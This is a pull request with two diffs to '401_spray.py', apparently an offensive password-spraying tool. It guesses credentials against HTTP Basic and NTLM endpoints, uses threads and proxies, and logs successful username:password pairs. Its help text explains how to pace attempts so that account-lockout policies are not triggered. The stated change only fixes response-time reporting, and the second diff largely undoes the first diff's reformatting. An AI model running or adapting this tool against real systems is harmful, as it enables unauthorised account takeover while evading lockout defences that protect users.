### PR TITLE
Fix Elapsed Time Calculation Bug

### DIFF
--- a/401_spray.py
+++ b/401_spray.py
@@ -1,5 +1,6 @@
 #!/usr/bin/env python3
 
+from multiprocessing import Pool
 import requests
 from requests_ntlm2 import HttpNtlmAuth
 
@@ -10,15 +11,14 @@ from datetime import datetime
 import urllib3
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
-from multiprocessing import Pool
 
 def check_creds(opts):
 
     url, domain, username, password, authtype, proxies, track_time = opts
-    
+
     if authtype == "ntlm":
         if domain:
-            auth = HttpNtlmAuth(f"{domain}\\{username}", password)    
+            auth = HttpNtlmAuth(f"{domain}\\{username}", password)
         else:
             auth = HttpNtlmAuth(username, password)
 
@@ -29,42 +29,53 @@ def check_creds(opts):
             auth = (username, password)
 
     try:
-        res = requests.get(url, verify=False, proxies=proxies, auth=auth, allow_redirects=False)
+        timeA = time()
+        res = requests.get(url, verify=False, proxies=proxies,
+                           auth=auth, allow_redirects=False)
+        timeB = time()
+        elapsedTimeMs = round((timeB - timeA) * 1000, 2)
 
         if res.status_code != 401:
             if track_time:
-                print(f"Success! {username}:{password}  - {int(res.elapsed.microseconds / 1000)}s")
+                print(f"Success! {username}:{password}  - {elapsedTimeMs}ms")
             else:
                 print(f"Success! {username}:{password}")
 
             return username, password
 
         elif track_time:
-            print(f"Fail:  {username}:{password}  - {int(res.elapsed.microseconds / 1000)}ms")
+            print(f"Fail:  {username}:{password}  - {elapsedTimeMs}ms")
     except Exception as e:
         print(f"Error occurred with {username}:{password}: {e}")
-
 
 
 if __name__ == "__main__":
 
     args = argparse.ArgumentParser()
 
-    args.add_argument('-u', '--usernames', help="List of usernames to attack", required=True)
-    args.add_argument('-p', '--passwords', help="List of passwords to try", required=True)
-    args.add_argument('-d', '--domain', help="Domain name to append. If not included, then domains will be assumed to be in username list.", required=False)
-    args.add_argument('-U', '--url', help="URL to authenticate against", required=True)
-    args.add_argument('-a', '--attempts', 
-                        help="Number of attempts to try before sleeping. If your lockout policy is 5 attempts per 10 minutes, then set this to like 3", 
-                        type=int, default=1)
-    args.add_argument('-i', '--interval', 
-                        help="Number of minutes to sleep between attacks. If your lockout policy is per 10 minutes, set this to like 11",
-                        type=int, default=120)
-    args.add_argument('--authtype', help="Authentication type - basic or ntlm. Note: You can't use a proxy with NTLM", choices=['ntlm', 'basic'], default="basic")
+    args.add_argument('-u', '--usernames',
+                      help="List of usernames to attack", required=True)
+    args.add_argument('-p', '--passwords',
+                      help="List of passwords to try", required=True)
+    args.add_argument(
+        '-d', '--domain', help="Domain name to append. If not included, then domains will be assumed to be in username list.", required=False)
+    args.add_argument(
+        '-U', '--url', help="URL to authenticate against", required=True)
+    args.add_argument('-a', '--attempts',
+                      help="Number of attempts to try before sleeping. If your lockout policy is 5 attempts per 10 minutes, then set this to like 3",
+                      type=int, default=1)
+    args.add_argument('-i', '--interval',
+                      help="Number of minutes to sleep between attacks. If your lockout policy is per 10 minutes, set this to like 11",
+                      type=int, default=120)
+    args.add_argument('--authtype', help="Authentication type - basic or ntlm. Note: You can't use a proxy with NTLM",
+                      choices=['ntlm', 'basic'], default="basic")
     args.add_argument('--proxy', help="Proxy server to route traffic through")
-    args.add_argument('--threads', help="Number of threads", type=int, default=1)
-    args.add_argument('--output', help="File to write successful pairs to", default="success.log")
-    args.add_argument("--add_response", help="Add response times to output", action="store_true")
+    args.add_argument('--threads', help="Number of threads",
+                      type=int, default=1)
+    args.add_argument(
+        '--output', help="File to write successful pairs to", default="success.log")
+    args.add_argument("--add_response",
+                      help="Add response times to output", action="store_true")
     opts = args.parse_args()
 
     if opts.proxy and opts.authtype == 'basic':
@@ -72,11 +83,9 @@ if __name__ == "__main__":
     else:
         proxies = {}
 
-
     usernames = [u for u in open(opts.usernames).read().split('\n') if u]
 
     passwords = [p for p in open(opts.passwords).read().split('\n') if p]
-
 
     i = 0
     current = 1
@@ -84,17 +93,19 @@ if __name__ == "__main__":
     f = open(opts.output, 'a')
     f.write(f"New run: {str(datetime.now())}\n")
     print(f"New password spraying run")
-    print(f"Spraying {opts.attempts} passwords, then sleeping for {opts.interval}.")
+    print(
+        f"Spraying {opts.attempts} passwords, then sleeping for {opts.interval}.")
     print(f"URL: {opts.url}")
     for p in passwords:
 
         i += 1
 
         print(f"{str(datetime.now())}: Attempting {p} ({current}/{total})")
-        attempts = [ (opts.url, opts.domain, u, p, opts.authtype, proxies, opts.add_response) for u in usernames]
+        attempts = [(opts.url, opts.domain, u, p, opts.authtype,
+                     proxies, opts.add_response) for u in usernames]
         with Pool(opts.threads) as p:
             for s in p.imap_unordered(check_creds, attempts):
-            
+
                 if s:
                     f.write(f"{s[0]}:{s[1]}" + '\n')
                     f.flush()
@@ -106,9 +117,3 @@ if __name__ == "__main__":
             i = 0
 
         current += 1
-
-
-
-
-
-

--- a/401_spray.py
+++ b/401_spray.py
@@ -1,6 +1,5 @@
 #!/usr/bin/env python3
 
-from multiprocessing import Pool
 import requests
 from requests_ntlm2 import HttpNtlmAuth
 
@@ -11,14 +10,15 @@ from datetime import datetime
 import urllib3
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
+from multiprocessing import Pool
 
 def check_creds(opts):
 
     url, domain, username, password, authtype, proxies, track_time = opts
-
+    
     if authtype == "ntlm":
         if domain:
-            auth = HttpNtlmAuth(f"{domain}\\{username}", password)
+            auth = HttpNtlmAuth(f"{domain}\\{username}", password)    
         else:
             auth = HttpNtlmAuth(username, password)
 
@@ -49,33 +49,26 @@ def check_creds(opts):
         print(f"Error occurred with {username}:{password}: {e}")
 
 
+
 if __name__ == "__main__":
 
     args = argparse.ArgumentParser()
 
-    args.add_argument('-u', '--usernames',
-                      help="List of usernames to attack", required=True)
-    args.add_argument('-p', '--passwords',
-                      help="List of passwords to try", required=True)
-    args.add_argument(
-        '-d', '--domain', help="Domain name to append. If not included, then domains will be assumed to be in username list.", required=False)
-    args.add_argument(
-        '-U', '--url', help="URL to authenticate against", required=True)
-    args.add_argument('-a', '--attempts',
-                      help="Number of attempts to try before sleeping. If your lockout policy is 5 attempts per 10 minutes, then set this to like 3",
-                      type=int, default=1)
-    args.add_argument('-i', '--interval',
-                      help="Number of minutes to sleep between attacks. If your lockout policy is per 10 minutes, set this to like 11",
-                      type=int, default=120)
-    args.add_argument('--authtype', help="Authentication type - basic or ntlm. Note: You can't use a proxy with NTLM",
-                      choices=['ntlm', 'basic'], default="basic")
+    args.add_argument('-u', '--usernames', help="List of usernames to attack", required=True)
+    args.add_argument('-p', '--passwords', help="List of passwords to try", required=True)
+    args.add_argument('-d', '--domain', help="Domain name to append. If not included, then domains will be assumed to be in username list.", required=False)
+    args.add_argument('-U', '--url', help="URL to authenticate against", required=True)
+    args.add_argument('-a', '--attempts', 
+                        help="Number of attempts to try before sleeping. If your lockout policy is 5 attempts per 10 minutes, then set this to like 3", 
+                        type=int, default=1)
+    args.add_argument('-i', '--interval', 
+                        help="Number of minutes to sleep between attacks. If your lockout policy is per 10 minutes, set this to like 11",
+                        type=int, default=120)
+    args.add_argument('--authtype', help="Authentication type - basic or ntlm. Note: You can't use a proxy with NTLM", choices=['ntlm', 'basic'], default="basic")
     args.add_argument('--proxy', help="Proxy server to route traffic through")
-    args.add_argument('--threads', help="Number of threads",
-                      type=int, default=1)
-    args.add_argument(
-        '--output', help="File to write successful pairs to", default="success.log")
-    args.add_argument("--add_response",
-                      help="Add response times to output", action="store_true")
+    args.add_argument('--threads', help="Number of threads", type=int, default=1)
+    args.add_argument('--output', help="File to write successful pairs to", default="success.log")
+    args.add_argument("--add_response", help="Add response times to output", action="store_true")
     opts = args.parse_args()
 
     if opts.proxy and opts.authtype == 'basic':
@@ -83,9 +76,11 @@ if __name__ == "__main__":
     else:
         proxies = {}
 
+
     usernames = [u for u in open(opts.usernames).read().split('\n') if u]
 
     passwords = [p for p in open(opts.passwords).read().split('\n') if p]
+
 
     i = 0
     current = 1
@@ -93,19 +88,17 @@ if __name__ == "__main__":
     f = open(opts.output, 'a')
     f.write(f"New run: {str(datetime.now())}\n")
     print(f"New password spraying run")
-    print(
-        f"Spraying {opts.attempts} passwords, then sleeping for {opts.interval}.")
+    print(f"Spraying {opts.attempts} passwords, then sleeping for {opts.interval}.")
     print(f"URL: {opts.url}")
     for p in passwords:
 
         i += 1
 
         print(f"{str(datetime.now())}: Attempting {p} ({current}/{total})")
-        attempts = [(opts.url, opts.domain, u, p, opts.authtype,
-                     proxies, opts.add_response) for u in usernames]
+        attempts = [ (opts.url, opts.domain, u, p, opts.authtype, proxies, opts.add_response) for u in usernames]
         with Pool(opts.threads) as p:
             for s in p.imap_unordered(check_creds, attempts):
-
+            
                 if s:
                     f.write(f"{s[0]}:{s[1]}" + '\n')
                     f.flush()


### PR DESCRIPTION
Python requests is unable to reliably determine the elapsed time in certain scenarios where server headers are quickly parsed. 

Calculating the elapsed time against a time delta may not be the most precise or efficient way to determine the elapsed time, though it is reliable and should be an adequate solution for this utility.

